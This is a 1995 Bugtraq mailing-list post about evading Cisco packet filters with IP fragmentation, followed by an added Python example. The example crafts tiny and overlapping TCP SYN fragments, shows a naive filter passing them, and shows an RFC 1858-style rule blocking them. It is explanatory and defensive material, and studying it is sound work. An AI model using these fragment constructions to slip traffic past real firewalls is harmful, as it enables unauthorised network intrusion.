Bugtraq mailing list archives

Re: Cisco problems


From: mcn () EnGarde com (Mike Neuman)
Date: Wed, 7 Jun 1995 10:50:10 -0500


In a message to bugtraq, Paul Ferguson (paul () hawksbill sprintmrn com) wrote:

The discussion did occur on firewalls. In fact, there was a rather
lengthy discussion on IP fragmentation as an attack method.

  In a following exchange of email, we've discovered the messages from
this "lengthy discussion" are not a part of the firewalls archive. Apparently
Brent decided they were off topic and removed them...

  So, my original question stands: Any information on this?

  My *guess* is:

  The filter looks for a TCP packet with a SYN but no ACK (rejecting incoming
connections, but allowing incoming replies to outgoing connections).

  Fragment an IP packet so the TCP header (especially the flags) is moved
to another fragment. The router allows the packet to pass (maybe even the
next one containing the flags as well?).

  Is this right? Or is there more to it than this? Do Ciscos reassemble the
packets to match the internal MTU?

-Mike
mcn () EnGarde com
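The guess above, worked through in code. This is an added example, not part of the original post and not a description of any particular router's behaviour: it builds a SYN split across two IP fragments so that the TCP flags byte is not in the first fragment, runs both fragments through a stateless "SYN without ACK" filter that inspects only first fragments, and then through a hardened rule of the kind RFC 1858 later recommended (drop first fragments too short to hold the flags, and drop any fragment at offset 1, which could overwrite the flags of an already-accepted first fragment). The overlapping variant covers the "next one containing the flags as well" case. The addresses, ports and the tmin value are constructed for the example.

```python
import struct

TCP_SYN = 0x02
TCP_ACK = 0x10
IPPROTO_TCP = 6

# Constructed sample endpoints for the example (not from the original post).
SRC = b"\x0a\x00\x00\x01"      # 10.0.0.1  (outside)
DST = b"\xc0\xa8\x00\x05"      # 192.168.0.5 (inside)


def build_tcp_header(sport, dport, seq, ack, flags, window=8192):
    """Minimal 20-byte TCP header. Checksum is left zero; the filters never verify it."""
    data_offset = 5 << 4  # five 32-bit words, no options
    return struct.pack("!HHIIBBHHH", sport, dport, seq, ack, data_offset, flags, window, 0, 0)


def build_ip_fragment(src, dst, ident, frag_offset_8, more_fragments, payload):
    """IPv4 header + payload. frag_offset_8 is in 8-byte units, as on the wire."""
    total_len = 20 + len(payload)
    flags_frag = (0x2000 if more_fragments else 0) | (frag_offset_8 & 0x1FFF)
    header = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, ident, flags_frag,
                         64, IPPROTO_TCP, 0, src, dst)
    return header + payload


def parse_ip(pkt):
    ihl = (pkt[0] & 0x0F) * 4
    ident, flags_frag, _ttl, proto = struct.unpack("!HHBB", pkt[4:10])
    return {"proto": proto, "ident": ident, "mf": bool(flags_frag & 0x2000),
            "offset": flags_frag & 0x1FFF, "payload": pkt[ihl:]}


def tiny_fragment_syn(sport, dport, ident=0x1234):
    """Tiny-fragment attack: first fragment carries only ports + seq (8 bytes),
    so the flags byte (TCP offset 13) lands in the second fragment at IP offset 1."""
    tcp = build_tcp_header(sport, dport, seq=1000, ack=0, flags=TCP_SYN)
    return [build_ip_fragment(SRC, DST, ident, 0, True, tcp[:8]),
            build_ip_fragment(SRC, DST, ident, 1, False, tcp[8:])]


def overlapping_syn(sport, dport, ident=0x1235):
    """Overlap attack: first fragment is a full header that looks like a reply (ACK set);
    second fragment at offset 1 rewrites bytes 8..19, including the flags, to SYN."""
    innocent = build_tcp_header(sport, dport, seq=1000, ack=1, flags=TCP_ACK)
    hostile = build_tcp_header(sport, dport, seq=1000, ack=0, flags=TCP_SYN)
    return [build_ip_fragment(SRC, DST, ident, 0, True, innocent),
            build_ip_fragment(SRC, DST, ident, 1, False, hostile[8:])]


def naive_filter(pkt):
    """Stateless 'established' rule: drop TCP with SYN and no ACK.
    Only first fragments are inspected; later fragments are passed as continuations."""
    ip = parse_ip(pkt)
    if ip["proto"] != IPPROTO_TCP or ip["offset"] != 0:
        return "pass"
    tcp = ip["payload"]
    if len(tcp) < 14:
        return "pass"          # flags byte absent: the rule cannot match, so it passes
    flags = tcp[13]
    if flags & TCP_SYN and not flags & TCP_ACK:
        return "drop"
    return "pass"


def rfc1858_filter(pkt, tmin=16):
    """Hardened rule in the style of RFC 1858: a first fragment must carry at least
    tmin bytes of transport header, and a fragment at offset 1 is dropped outright
    because it could overwrite the flags of a first fragment already let through."""
    ip = parse_ip(pkt)
    if ip["proto"] != IPPROTO_TCP:
        return "pass"
    if ip["offset"] == 0 and len(ip["payload"]) < tmin:
        return "drop"
    if ip["offset"] == 1:
        return "drop"
    return naive_filter(pkt)


def run(filter_fn, fragments):
    return [filter_fn(f) for f in fragments]


if __name__ == "__main__":
    whole = build_ip_fragment(SRC, DST, 1, 0, False,
                              build_tcp_header(40000, 23, 1000, 0, TCP_SYN))
    print("unfragmented SYN :", naive_filter(whole), rfc1858_filter(whole))
    print("tiny fragments   :", run(naive_filter, tiny_fragment_syn(40000, 23)),
          run(rfc1858_filter, tiny_fragment_syn(40000, 23)))
    print("overlapping frags:", run(naive_filter, overlapping_syn(40000, 23)),
          run(rfc1858_filter, overlapping_syn(40000, 23)))
```

The naive filter drops a whole SYN but passes both fragments of either attack, which is exactly the bypass the post guesses at; the hardened rule refuses the undersized first fragment and anything at offset 1. Whether a given router reassembles before filtering, as the post asks, is a separate question the example does not answer.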


